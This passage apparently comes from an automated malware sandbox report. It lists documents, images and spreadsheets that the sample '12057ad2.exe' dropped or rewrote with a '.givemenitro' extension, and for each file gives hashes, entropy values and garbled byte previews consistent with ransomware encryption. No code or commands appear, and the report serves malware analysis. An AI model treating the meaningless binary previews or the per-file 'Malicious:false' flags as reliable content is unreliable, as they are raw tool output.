                                              SHA1:B5F9024611BDF71B57EBBF5C41A202CA4075C20B
                                              SHA-256:D8EABBC7CF745CC1AECA08043F0A4D3A2293A2556A4F3D83E199A624184BA441
                                              SHA-512:4F93C16FFBFA3101D4BBB1AEC8C9AEBF576C9933C4C6D265E78EC23076591E4C043DDDED6F7EF66899578DE5015DAD3E78AB16F9B6F2FB237EB645BCBDAD89D5
                                              Malicious:false
                                              Preview:,.z.iz.Q............Y.8m.........O...q09........g.G..%..........rIP.k..3....ZJ54 .F.....A:...TE.J.+~._.,.I.t.9.<.:.....KX.~..k..n...v...U..DI...f...j,.j..R..$./...8.}M.......D:V|h._..F.I2(.4.x...--].......JxH..Q}hO.?.7.vv{..^y!..=..,..fQ/.......&..X......77.d. U..f.S..a.........T.M.PX.\...{..{.W.esE*...KZOtZ.BP{.t.=.g..ns$..h.YK.lf|......aD7.<..?..H.1.....=..-....O....>p7.J.'...kYI......*...zsm.i.u...s.k....f4....Y....b........9...#!..`.....7s.v..d.X....h..~..r^.....Sd"`...t..l.{:4..g....N...{.........L..y1.`...o...z.a[..m...M.(0.od....LNY..\.1?-U..R........P.i..^..(~...b..'........&..r..s.hp..5L.>..}S;.7.3..}gP......f....."..6.TsE......eWf...&..:.#x.f+.......4..-.=....v...>.4.G.,5l.zd....;+...\A.=..(....T.z.'.....yo..P.....}........Q..r...X..hn;...U......nlZ~.Q...E..'s.V..}#..=...[.....4~.M......T.....Rx..o0m..A..'..|JlS....WV_+W......8..>:'z.tW..b..........8G...20.E..mXg..1...'..j?n.K..mN..)l#..|gJ.......2........o...p.~N>.x.?l.u.f.

                                              C:\Users\user\Documents\NYMMPCEIMA\BXAJUJAOEO.mp3.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.844890801321295
                                              Encrypted:false
                                              SSDEEP:24:iL+FjW8lWizyUYQhXlIhSIrDwSNnLysj3IYMtUBT:i61WRUBJySIr32u
                                              MD5:7450D0DC33DD387590C34B40D93BA6F0
                                              SHA1:A7E0EED526A6FB2D1BC86FA294D8AE6041F24EBF
                                              SHA-256:4431801355AAFA4F1C594C9F953CF3985D571D121C387AD6BE55EFBAEFCE993A
                                              SHA-512:AF70B7D9554FB7FF8401998CBCB024D640FD387AEE18B4C89343CBD1AC790B15B150C698158F89F3B13ABE0FF643334C799202D76B187758FF2D00A92E87656A
                                              Malicious:false
                                              Preview:2...2M.72..b Y$/...dj..\..E.i...P.l'...Lq.?..]...R..u.u......._B...."....G..C...|../~.{HG.7.h.K.%.`...{FB....m._K...ou5..3(;.K...}:.......i.L.lk>.D:gM..iU...*.c^.......]...IY..m...ekz.h...T.....v...0}0....5.1j..!+......m3.4.[.?.L&..C.x....e=:..'K..e.;..E....7b......+f...y......s.X......E....b).@..],..[......~.*.<..vbo.}......4L....':3..A*<...k5...z...[..7..Y...c..]..]...../.>..Z..K^0.(.....q>....=.7.b#.j@.../P_..D.6.......a..._^....4........I.....B.\y.|....O:..`~?.i.v.#.+..z.A.DQ.[....yM.D...>D.w.....v.F.Q.XP.j..'.[.2:..4DN...3...s9..w.(C........ . wmC..)xA`.y..c..r.jk../.1...y..19.w..7....+*J..(.G...9U.l~......j.......H..2g..V&...d...L?..N....M".ReH..5....7.M.S.T...f..$...=8@.......S...V.5m..-..9.'.b\......d&t.YU,.)q,......R..ad...r......<...Z.z*+.j[.d..2|L=9.....1j~..<./..v.?Hp...u..Eryl.b....*.&<6.-.x....+..5...R.}.X.Q.3.VY...O]...f.........b3..s.m...6S.X..i.Jk.j.....V.=D{.uU.z75.....'`a.3....N.j..]...L...._..G.U_.

                                              C:\Users\user\Documents\NYMMPCEIMA\CZQKSDDMWR.xlsx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.8455318572664785
                                              Encrypted:false
                                              SSDEEP:24:8ojNVerJZelaDARHwwDmpXy92PQMI48/fT3dmnwPwOmdY0+1T9t:8t0lAkQwDmpXu6RITfLdmwP/WwZ9t
                                              MD5:F8F43403821E576A78ADBC5EC16C6262
                                              SHA1:9B97AECC0947AB406CBCDD699F42031952E941FA
                                              SHA-256:695760F2A4351F7B6BFDEC87504088C8565B02FC9A8964A7E3964F7F414F5D3F
                                              SHA-512:750048BD034AFF476ADDA29BDE6B57A5118CF18E6D4051A2DD463D267DB3DC8E14FE6AE15A088AD01AD91C8933FC1F5F448264B2C3682C2F89FA8D269F3AC424
                                              Malicious:false
                                              Preview:..t.k.R..2.....D.......a..j.m"$m.Z.........J..mD.i.O...9 =K......b..Vv..\..s........C.=]?m..E%.WW..W.11...\..]Mpx...{.bb......4[...?rK.....:."*.K..1.Q..G..N...N.|....{..Y......G...m..@..L.S..R..}V.:.NmN...Dm.....p.D..1.h.[..Z@]NNS..2a5N`u:HA..z.s.9'..........]...cG....Xqn.....7X.F@N...d..^Xt.N:0.N.U....n.3?..:....`]..V..A.e.4..........Q.x*...k...a5....._\.[.=.7[#"<....w..d...`..C....<..."..I0.....9...r..|$8.9.,z~8q...H..c..M.....A:7...h.r1..9?....p...A.I..-..xYv...x.K..B.%.i!..y"y.j.<.Cm..sK..).......q...\s.c.Xv..H...u.....=..T.A........&....9.-.4...\.$...B...t..6?D.`p.&.T.].B....kHd..d.<.y...$_...cf..gJc..Y...........I2........02...h....X.:..b..Zn....B3.K.bi.c.2..........v6.Gy.[D.;.q/h\..gy6!......^..h..Z.....Y...D|<9">.q...=......XC....(.-.R.....tT...q.M,.A.X..K...p!..s....3.*wK..V=.}.k.r.@`ZX.....b.y.($.X....F...m..%j?.r.L..}6.wNT5.)...P...R~.....*........jR'.f....1}?&u.p:...h.9k.....U*.Ck.....f....l...,`.z<v....*.oE'.~}N.,.

                                              C:\Users\user\Documents\NYMMPCEIMA\LFOPODGVOH.pdf.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.831191934927958
                                              Encrypted:false
                                              SSDEEP:24:ogQJJ/nEI3lFSJamZzy2UEk44TrD1eSWxxB:olJFjRmZzm64079
                                              MD5:D780CF3A10EA61218DD05B43CDC09F93
                                              SHA1:E2D17459B17694F1D73A532EBEF766C45D9E5AF2
                                              SHA-256:C3676733953644768C5C8262015DAE0924ACAD6988E99254A295DD751A0D6B70
                                              SHA-512:A3C47BAB2C5CFBA2A057CDF6FD9CE88854C3B1E836B0B6AA750748B98F8D11A0FD8F0516E7ECB7F6688EFD3F87CA82BA95FB6D61F1ABFFFF95B368930961AB89
                                              Malicious:false
                                              Preview:7>..:.......=%E7.`..6......jH.ro.J....[..@.J.]m=.@.z.1K......z.]..2.h..HQC...tV..cT.i.f..E......Y..Di.5.....t....28......~{.Y...'....a..~.BV.F.....b...;"(N.. .K...aH;.X9.A.N...C.C....{q..pA.w....2b..s.B....TKSE..\.('.u....d'..rg.g..#!.3....sp.#....-.....M..g..E.v.7.Ksr.S..F.C\.Tj..[..ak...R[.luc"r...G..,..r.p.....Z.nG..8Z.W.R...*...E%ojH.K..r-...n.UW........wi...xN....E.i\,...~..grb...,.%..z3.<..3_?...arh...c.D..#wnY.x......+Av$........u.(B..=..0=..&(_q..I....b.....xn^V........a.-P2.[.iLc..Q.....6...N.t..,.j[...M..B.E...`.Y..7...?....3t.{hj..3.....T......[.4..."..C?o.."..x..jo....>.gn.A..xWog.J.o7...6..0.XS.a.L....mQ...9.3.@.m*...2..Q....K..f'.).d."pFW..jMM....P).....wj..t^".{..Q-...8..k...e..*.y.'u.>...=.%.P..E...{.}.Y.a.......kd....^+.'...[..{.J21.....#..?s...;.......8BM.:I....7=..n..XyN...97..5..p.S<......IX..8..\......P....;..8...H.g...wP!1...O}..P~{.If/... ..('.Z.M.x..-.......c8...........N..M.Q2es._CN#.[....o.T...pw.&!.u.of..X..=..

                                              C:\Users\user\Documents\NYMMPCEIMA\NYMMPCEIMA.docx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.812321320033865
                                              Encrypted:false
                                              SSDEEP:24:1PQEm/QOLh8CG52iY0Aa5qe3f2kcYqrG0Jl7QbZa6ryfIXV3H+eqX:yN/3GbAEbcYqP7MlrhXV3HsX
                                              MD5:4E2DC268CCF6D8B3E118ECD37EC51AC9
                                              SHA1:FF9A0EE5FAA88BF2C7702E72341F297D158116B9
                                              SHA-256:31723A607CE94B08B174CEAEAAC5E4C5833A39A7E3824E7E09C9A5B0498E533A
                                              SHA-512:3862AF84F1A3EEB107EAF9AB533E05005A434F1B327E6F80BB2021EDC22B443E82895B598B6C271322611B77CB3928283729FE2B97D20AEAC2E3D5FEB20B5B7C
                                              Malicious:false
                                              Preview:D_.....;...T.......@{k`...J...e...R....hDp[R.=F...<..xh.7...A+q9.]v1.T2.&'....XY.......oIi&4..(.,...X...E.....B.KP$.@9{8.........F";q3....a0......M..Y...g..I.t...\...e..x...qR.p..~...>#/..........{."...H_r..~.j..2X. 9._.S;`:*.....E......'.0X..]....K........!..u....h.........7.lvs%..=...R....p..s^..|_..f~.\K..[{..c.RM*.T....q..{.......no.t.4.xS;.'...D*.s9,.....Q.x.t.K.S.`../C...9.\.k.%..F9...........|G.=.l.......I/....p.O..!....^H.>...`..."........~hw56..q....... .54..Wh.....$.7O....3.8O.$Gi......X1|c...8....wn%.d..0P U...s.z.$.5...5.z...g;4......O..oy!......TjJ.Q.....J....yt...Q.7.R.1TE.*O..c...._..e...~..FL..xk.RK.1..j...........2YX......Z...h.#.a..%Y.....>.....a..h.9@...7...A[GH..\....o.)..;&..p.)....g......P."..9._.\...:.0k..2.3........8.V/.?...EE0.O...N..~U.R.R.tBzi...%..ywz.d....E.1_..9b..N...7.?..>g3Q[..d..M..!H9..z....P..:p...'I....-.....r.Uk.5w.e.9......J..w...+..........o...t.Nf...0i...@...R?..Lp..)F....;..#S8f..?..)......1.v^..gK.L.

                                              C:\Users\user\Documents\NYMMPCEIMA\QFAPOWPAFG.png.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.811585987004511
                                              Encrypted:false
                                              SSDEEP:24:fogobqw9sxEPjY6pdI5NMK3DZVPGsopv/P:f5o2w9T0ld8pv/P
                                              MD5:D5A2C2FA7DFF465048F50C57E23043E5
                                              SHA1:5F05EC1137EE96D7CA25353A17A31187EB2EE38A
                                              SHA-256:955CDE07964104E00F7278CCEED960E2DD372249DDC00EF942EC37A76B47CEA3
                                              SHA-512:B187916E2A7E38B977B036D5EDEAC6EFB43F2C95F84523FE78219360A22045DFA1324E62C05725E3734CA14470D0507C6391EFF8EB9EFABE0EBB1DB3747741CC
                                              Malicious:false
                                              Preview:w.W6i.w....<..7.~$b8@...`.....2.....(0!.D~%&.~...LE..f.A..0...{c.U....YX*9&X.V..c5.h..V.6.y1.fj.%}.>..W...f. ..r..\.."..ktC.g^......p)dT,..i.....wN...u.O.Xqq.u..|...x,r(.Z_..k.W.^...i....t.H,.?.A?2..<f.6...r...%(....VB...!C...mXl....M.{.w.V.&..&.~<....:.#...t.k.,.../....#..JN.........#.A....,iq.-.....R w.S."f"....K.1..(.}..0....D......k....e..Ks.P.Dr.p9....^.o..J..0.`...t...7...........&.^...zn...l.v....`f.W.Y....Yg..Z.n..1..ZH...!).?.....#.0.8.[E...6C.6...f.@....y....H..q.....#..~.X...#...5.'.&2$.u.P.......B.w.z....mm_Y..{.W._......zb....I.l..6.J.....?$.F....^.._).k..i.x...&51..... .o....h.....)c...]?.$...}..wX....<...A6.c..GqP....o...=..NT."5.u.w.qn..L+.(zD....'.......`&......H.:.(.."g..K.....e.%H....b,..^..gT/.&....F..M..r.%.......x..r..Z...n.].)...r..I\>K.j.........i.A.....L..R.....3|v..sd...V...n.5*.....mM....l)F...P.2....j..x.|:`HN...I..........^....:o<..C.N*..s.T.'..<..>..4........o..m..~..`M........^.v...(W...xE.C......P.LN.....H..

                                              C:\Users\user\Documents\QCOILOQIKC.docx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.783189459609936
                                              Encrypted:false
                                              SSDEEP:12:66M7wDhDEQMHKm5NqTgAtVf+P+nR/mV1IGNWGhcDIBpSi+itLRsKG2Z3KpRV5kLZ:66M7KZETQnf94IGAq9fJDtL6L2Zukh7
                                              MD5:8A537F2B12A0B53205E36226DF856E13
                                              SHA1:C21F73FC6E593F61694989236B20DC05F08F21BC
                                              SHA-256:FF36768A88B62F183D0764FD847C4447C35DAFE13B3CD990CC5901C2DE34226D
                                              SHA-512:EAC06AFC0D35C50E1FEC9B4D581445A6596F89053181013996BC30762BEA02EA60C7CBFB7C517032050714FCE576FB21D93E0BF17C6D0161403EDEEF6CCD23C1
                                              Malicious:false
                                              Preview:.>...N.B..B2T...=A.t3&...&@>.`....ds75.}K..e..........0.v......F/x0....g...T.w7.m..q|M...W3.,.w.v.u4p..K.j:..68.+W...-.G...9..3..N..?..,.0.......e...N.U.....v.A..6.S#X...5........H.>.W.>m.....y(r...Z......z...!..xc..V....+.q..N.D....5.......G..:......-C.%'........x.@..o:.D{.2zmW....,..0b.D..........U...z.V..B...BB`.....[=y.{...q;`..+'y..Q....Ho.>Q.U+..?.q2..+..........H6.."..9.........A..0b.m.$.t.7........z5..H...L...J...J.Gi:k....8J-...4AD..20......,...y.=0.=.v.g.W...~......GO.u...p..`d>'....5.H"T...ngM?.gj....1..K^H...K...pTo.j)gc{Re.._...7.i.`^r.Y;)S."..o....#.......M..0.F7.......x.{M.IO.3...11..,.*.r..D..O1."..)....t..../+...M5.Sp(b.a.................5....w...0..|....'...7.U...x..5q....jc.;.|.:.....zaA..|...I.l .+cQ......q]N....%...........R...r....>.XA...c:c"......y.._....J.)*..<..8.......D..Y....j%..Z.. ,.l.....;..r.l`.qK.'.'..2...D.R.?..H....Tc...@..n...E3r....1>.Z...Ga..e)..*.~Mx....,k.JmQk.....[ ..ikp`....}.@j..d. .7.g6.

                                              C:\Users\user\Documents\QCOILOQIKC.xlsx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.8218297255084135
                                              Encrypted:false
                                              SSDEEP:24:5nmwNOunJuuYgqowFmMXJz4GtfpUe2D+TpokpjV5lofBIzOb:3MuJnMlxIoKpV
                                              MD5:877F172615474E0497870BE7BF99E191
                                              SHA1:292DC70AC8802C6AA16E5C5AAB0455928F3EF4F1
                                              SHA-256:EC8F29A3C812DAF534E36E2FF7E180BF6A7806873DBCA861CBF0E559EFF46524
                                              SHA-512:626949651CBDF63FED7F37CB24822E6EBC0BFD54B68CC20A1EEF7E28637CFD501B112A0D07CE29BCAA08B084516ABD4DE7A8DAE204C367C5FD3D06BB90F7F39B
                                              Malicious:false
                                              Preview:..G..6....q.F..Gw......_.D...w.T...&x...W.......b.u.N. ..T.q....Q{..|.>t.8.'....GD.r........+t.....fu.e.^.....{.O/.L.7.B....X...k.......3.S.}.....2...'..T.....h......>....)o..)z.f99...8.7.z...{.8..a...xk.J...+....l..+@l...{P...e.."g.`...[4X..f~l...+.5...S. ...>a.Lb..J.7..{..S.U..P..EG|G..|ttq..B..........."..g....E=.3....8f...b.........J..m.L...Q.B._..@.E.F$...Wvk.]&...j.). .w..5l8Zo./&....L:1..t...#.....R..j....|X....Mb.h#......q.'.=..G...v...>o.....cD.)...=,|..."\V{l......r..s0..(#.........s....-....BU.....D`t...k.^...RP.".'g...xH...7/.....q.....)....ir.F.Rvz.\..7z.<..w1m._..>.Gn...P.w....!m.O...cJ...V..S....H.\.....X.cw......;....{...."...}.........p..+...j.+o..6..Q......(.c.S..#....sp.m........6.I...7...N...]W....#.../.1Ua......6.W'&}..L#....Q........;.U..C[..2....p.........$.Y..Q..W....uS.....x<.(.S..u..\D...-..L..n6>2.KX$....L....b.].K..|.Q>.}.?8$..h.9.%...n.6.....sA.t......=Z.....c.....k......*d.if.3Q .nh..U/.HY..o%...

                                              C:\Users\user\Documents\QCOILOQIKC\AQRFEVRTGL.mp3.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.8243743445976195
                                              Encrypted:false
                                              SSDEEP:24:ZphfyAVVt/qi9YoWE0BcUMk29eZpv62albMEdbsIdKWFLrHqgJE5oecb:DhfyEqimVE0Bcg2Oo2aZVd9dKurK0
                                              MD5:97C551A8549EFAE7E1EE72CE59662E46
                                              SHA1:2E1FE46AFE78492EC39A4FCCA8F08B3E1146563D
                                              SHA-256:44D2503C245E20276C84B8C8C95865232E5E5AA8B98347D915000578F4CC6BE2
                                              SHA-512:21B0E10ED1A1B0BD6D9CD525276AF1392046BD38AD830A63F36DC8EAA36D6977D4D4EF24A0BB5A4562D17883447AA3883CB580277DA861B6AC43D2BFCC240E8E
                                              Malicious:false
                                              Preview:.'....{...O...... .........W.&.A.0.Y...t:..J...%p8".U....$.VlM...i.r`I..o........<g...z..........F..hgW-. V......x..e...L.....L....a.qP.iY..(.....mS.U........"%...y.O..~..4.J]#............=h...\u..[l..;..#BSl.......;s....x`.#....2j@..l@...*.T.;...-.u..r..E.b.g\Y......[....UT.cJY.....2.n...~...?s.s$/i..1...9.......w...M.xn..a.......zA._.v..h..8.l.z..ur...C.`..e{1.....=.l...h.@.@...H*..!.+Dd...xG.o..)..$......vX-...@k....$..P .g....d...m.....Y+.O...D....C.5.4~.8.Q.....o%..._..cV2.w7>......S9.....o.w9}c.s.*....y.N..%[..'.b..qZ....cm...X.gQ..I..$F......`..='2N3....#F.yk...F...`i..i2%4...n:D.|...t.U9......#.z....:...O.J..]....d...V..oT1.^,.Y....{...C.....k..P...7?+..{...|..T......S..\.Xg.!...FJ.a .../v...O..=. %..W..^@^U...: ..........kd_Dac.s..w_.4.-..AQ..}..S.....'q...E6.........X.\....}.Qo......\.....r.t.pX.j. uzb?...c&_/..E.}...#S(}.l..@.....[x...........o<.eZ..0U........[L.....EQ.z.PZe.".A..*o?!.W.n_;h..)&c....D..;)..O.d.s.`.6!.u7...z..?h.

                                              C:\Users\user\Documents\QCOILOQIKC\CZQKSDDMWR.pdf.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.819363295098563
                                              Encrypted:false
                                              SSDEEP:24:d2TNGnav77Ig8713bcV/0uumd+iKIFLDnIIUxfOhXP796+jC:cNGye7pBl1I5sIUxGtTU+jC
                                              MD5:31EF7431B205671783932852661C68D5
                                              SHA1:5D0C49B24605AD51051D90D1996E35553F862E0D
                                              SHA-256:7D87B44663BAAE4C397E588C800C01314CC90063BB9A21CF325B4F1AB8489008
                                              SHA-512:1705FE4AAEDA42382F1C43918709A2C6A6201D81313E25B7A48E4005962063DC343B4EF91AB8EA2A6661A47E940648DF4C7A214C0D819725518C19164BDC6977
                                              Malicious:false
                                              Preview:y.uBe9x.|ar..M....KzE....S.BM.......b..$......56.@.......0|m...}.|..7.]..G.(.P_...[x*....D.+EJ.v.. .!.T..2..L[W..LhT..%.,.$;./..I..x....w..r...f`r.Gm.!`.w..^...`.N...h.$.{....4My/.....|-.B...8.\....R.....0..N..S..2q....A.4Y .Q3...rS..m! +..l....k.~.Xn....(p20..k...m....{8..a.(.NG..*...c.Z...............E......H....4.......Ii..{n..B.I.....w...x...9.c\.<2...\T..DW..>'D.y..n...:..'X,...rx...|N.g.X3....X!] M4.,%.L.i.~.M.S..(..y.-._q0On.......s. O.....T....-!.P..OV.1:..u.aR.d....@.;T.0.!i...05...j..#u%.rO...&.!Y.i,.3..x.~..(f.T.~Y+.....D..&........W....L~.....a..G.0...94.....,.=I.....2...xjP....bIH.../.B..U|...B.5..O......hB.hB.a.l.9.D\..dDP.t./."v.1.f.Q|G..h.M.....H.hYY...4!.u.o.L$...=.I.....b".(K.46..nb.....Y.Y.....v.,'..I.L)}E...6.Q.."..:.6..B..K+...PV.l..../H_).(..Z..j@za..eA..#^N....W.....j...v...&..,u.gOL....u...s..3...a... a...........l...../....u.,.7{../4...Xq...R..b..t~......u!...4q...G....S.-...z..b...:#.Up.....gh..7..I,t....I.+.......n..1n.

                                              C:\Users\user\Documents\QCOILOQIKC\LIJDSFKJZG.png.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.834619345725391
                                              Encrypted:false
                                              SSDEEP:24:07Jvk5qyHmgoUxWeAe+CS4v2bFvXwWozmd6dG5BpF0r5NGTjQF:svk5qyHmgs2IJwWB8G5BpurWTjQF
                                              MD5:1E80CE44F237FF6126DAD6FA87D9D9B2
                                              SHA1:A977ABC7ADFA891B4AA5A7F375226194EFABE5EA
                                              SHA-256:C90855A3C50FAE0207E7DE00699939F688605DA0603C47EC96E54CF2CE976EED
                                              SHA-512:EB90EB1036BC5214A3B219062ED614D9D1AD35C53F4440390280F370A99138C4FD21577BAD7EC799790FEC953F32C0CAF75F48DE087D6150106B5F5434A04034
                                              Malicious:false
                                              Preview:3`S.+.a.......Da...s^..]b..{....8].Lg..(?=.x.?....r.8.rQ....OB>.....E...oH...E....-....R..9]<6..LhE#.M..]....NV...D.0.;[...4l;.I]...S&....{.q...z(8../....,.R.I.v.!..B.=.....2.......L.../.I.u....R.....bj.a.cb.6.M.^{...\..;.F'^...3gN...i...k{.v.):..Y.\g.?..."e.....wk.w}.V...>..O..O9..Y..".H:..>Dg3._.6.-..-.\|]._;.1!...0....D..]-..y..F..&..au..j.0.C....#3h ;rB..f.v9..g.BT`.j..8y..x..4q..).H...w.M]s(pd..q..m.....}..G.b%k..b.BN.e-P.h...:..@nU.!.s.;.s.U.P.=.&...O....p...Tt.......H?.L7.$.....S\..7.R.<.. ...[.6.R.7.E........U...:>....H...H....Q......4..*l.3.D.w....mBE.......).)...l.J.ww...$.l.i.C.Y.N.X7.....hHVg.3....?c8gVX..>t]q.....4[..5D....Y.&.Ox...^..e....Z.;...oF.v.......zsu..x..y.~.J7=.....I._I..(..e..D..*X!<d=0.6E.......l.E..|..i..s.n.H..{;..Z*.........]..a......~$%...sA.k..;X.^...W"|is...;...?. .mpS.i.:..X.2A.:....4.?Q.+p.U6..cj*....i.d*?8....b..v.;.w......sI|.cxvO.g`o..../..D...+....|.+VF.=.YD...(aK...X{5..l.......x.=...)...*=._.@....

                                              C:\Users\user\Documents\QCOILOQIKC\QCOILOQIKC.docx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.84279297234539
                                              Encrypted:false
                                              SSDEEP:24:hE9St0gBiCHJrjUP9QuUtxAI2+9HzqalQIXH0dUBxwdd:hpPBfH5wFlUtxD2Sn/Vxqd
                                              MD5:2A87F732B62E1D49770D8407ECAE63A1
                                              SHA1:6457704BFC1B3CD0FF5884DF253B01EC60A84DD7
                                              SHA-256:23FA87F994723E1EF6072E5EF801AB2116AA510ACD49BA26FF7BD59A99915EC1
                                              SHA-512:96F65DD6E9331ED10B783DDB1B2AF3D7F49967922FD807EA770B28258CA712862F0755705A593B7E5DC714DAF25C8A48573C248ECAFF2B07E006226D222DC0DE
                                              Malicious:false
                                              Preview:......._,.p'...E^.5.O.4..:=!.T}....A.}?SB6.'.O.z..l.....m~...{_.#US.|..........^.._?..A.......QB.t,..=C.q1....Fj.7.....q..D...3..;.. h..6....)....-.e).....K!....bkR.9.....`X...>....c5~K.H..{.t..D>t:.....i....<g~.7/.S.V..4.-J;fK..2....bh...^.....X..8U=(...Nu.0R..8.&v..8.U.v........]..n..o....H."E.f....p...X..}V..$.."....`o...i.....c...Z.%.......'.Jw:0.FCn`.&M.A..h...$.jJu.%D......N.k#4.<R....?8..(...\.q..j.f.t<'9.%V.....5.....@.^.....!...N ...[..Y...^.....a'/W=..a.pTG.T.{.V8`..|.......E........I.p.....Wi@...-cn.../F{5<A..{v.p..o.?......Hd.C....U.~...>.qY.7E=.r.......qrN.5.9.Z2..C......y-Gq...#\..a.4a.....U].N.LE..xK..U""....(>...Q.Q....tj#....7~......6.W.F.....M^.......t....G....mc.m.v...>.R._..U......O.E...~.S.?........7-9.C."4%...J.T......o6E.).S..%Wi...%.^gwy.c...9..C&.$......j.,6...[.8.r.x...Cp.....Z.............|..k.........Z..@&/...p.n..fj%......0.2e........:....X5.8...UO~d.'8...ox..Zw..KU.9.]*...h.6..'......?,

                                              C:\Users\user\Documents\QCOILOQIKC\UNKRLCVOHV.jpg.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.790889047525584
                                              Encrypted:false
                                              SSDEEP:24:/Gkz8WsT2HuFYJTZM8JagFGs+cKClWd9LKz2NAQ6Ro+/q:horT2OFYJTZxUg47cEddK6AQ6KUq
                                              MD5:4613C6CE85335878DB185DA33F9E6D9B
                                              SHA1:58141A4108F13BA02479376C61512F11E6987E00
                                              SHA-256:A3C5EAF6E3B7FA84A9CCE36F6657335EB4661A39DCB4391746F1020D201DB038
                                              SHA-512:DECEC2ACCFC1836A69FF4A0F3643E5B657E2E397590748380550E85C28D13C93AF3E75FFDDD4F5EE9670418A334D8A100933A5C0C634F33D8FE4D60E6388E008
                                              Malicious:false
                                              Preview:..h.9./Z....#R.......l...L.l.r.Hn.....].cv.e....{./.%...~....v..N...[*7....a.u.F4..v%.|...a.ued.z7.(...$i..x0J..W....c..z..../..}.....&H.J...-.&..up}...h.....^.......i...e._q.3..%.*..f......" .|&..*...jM.#+.7.e.<..o.sE~....l.%......bp....yi>.t.........F..e...~...bD........1..*..a.[...dZ..#...W.f.{.......e..i.........h\..y...P{...U3...qo...C..."G.U...d:2~..z.e......l.n_r..|$.7.k....Wo6V...<.....a.K...uA.e.9.X.o.<.hV.s....F..2.>.6V(..PNz.2#......{..z$....#.`G[N...qR.....fr.8.6S...T.z.x[..C-.v.u....Q.=.. ..4U..u.............}...K....h...y...zq...&7.L_]u$/a.....x..e..<.h...,u..S/.|u3..9..KQX{.7:.LI...z.<.....,;.....@.f3=.._.cG.eh}...4..r/.....:...I..N.K.lh.b.%..N.W.?.. IF.......?t.......>...9........z..l..,\......Zwp...Kz.T@6T..v.....Qif..wx.'...u..~.Xj.c.....?Tc....gD........I...._.....I.Q.`..8.gp..y._...|.%.._....QVkr.h.t...'...7...iz.E^.oY.[..P.<V.PhW.JK...N......>M^D{9....)L.{...%..F......&.9.3..~....=k.4..v..G.....K. c.p;.3p...'....N.U.

                                              C:\Users\user\Documents\QCOILOQIKC\ZIPXYXWIOY.xlsx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.802415498012615
                                              Encrypted:false
                                              SSDEEP:24:rlokhqk3Z7t9miIzqlrqng7+43u8hAAVZmFTkU1RZSyWtc6:uqqknE7zlWBeAVE2UjZSVG6
                                              MD5:BC234FAF3060773D84DCABBE73AF64CF
                                              SHA1:3C4D9675DB6C0A7EC047939AFA5E62FEA71127A1
                                              SHA-256:E101C5207C900D89F1364F5BF4E8B630BCD23E9045B5BB03A7B9B8A5F0A78272
                                              SHA-512:5CF06DCCD4F939F06856806B68A403AEE980FD46AB0DF868B4679705C5A098E206D46434CE3343CF95B2988BDA3CF3B915AA54BDB65BC16B5B38C16B5ADB9000
                                              Malicious:false
                                              Preview:..D..:Mj..B.H.E.j..*.P......o.I0C....p...0..`.-..i.y2..&.Y..UC.)V.__..m.W.D..?.}7...C#.....-}.'.9M.%C..O..iC.t.<.s..S....qdf-.|..5.\.S4.Y#.....|..Njd!Z3.1S...|..*...]]....+...{..D.r.Q....V....C.ar..R..O]v.4b..M....Y...>.h$..Z..R........`...Rgf.s...`v%.O.D..#...5........t.z.......Lm...-Y........W.<.7H.HG..N.2.N.KC,T.7..4\....).,9o.Y...2.........L..g;....j.D"....8...n...s.........C...z{..... ..xbm$.c..k..\0.9Ti.=..4.c....%.:.A....R.B..x.e.HZ;....&.nU..).IFD.2 ....[t..4..L..Ov|.\....e.f...N.. ..K.V.InY....a.....g....7.O.}........~3L.h.#.....I....{.......S9..8`..%.m....)........Zk..z.&.).f..l......'.S.S.z4_t..FGEg.[..GUo...v9.RJJ8......-.<P.*g....g....K=I.){@.x`wu..kVr|.6.n'...<.....(.N4....m.)....o7K.i6..........UI)H.%..8....t.fL........*.,.[..{k0...B.u.....p!.1......"...x.Q.r`.z7f...j*.'..`g.Y...#1..^....w.q..T.u...e.-.*k..z...........B.4.......".~8;.tvj+..0 ..........`@Q....a.2.x..!&...^F{Z. "......S'@.<.'...|.'k....9.q..i..:

                                              C:\Users\user\Documents\QFAPOWPAFG.png.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.810112335394133
                                              Encrypted:false
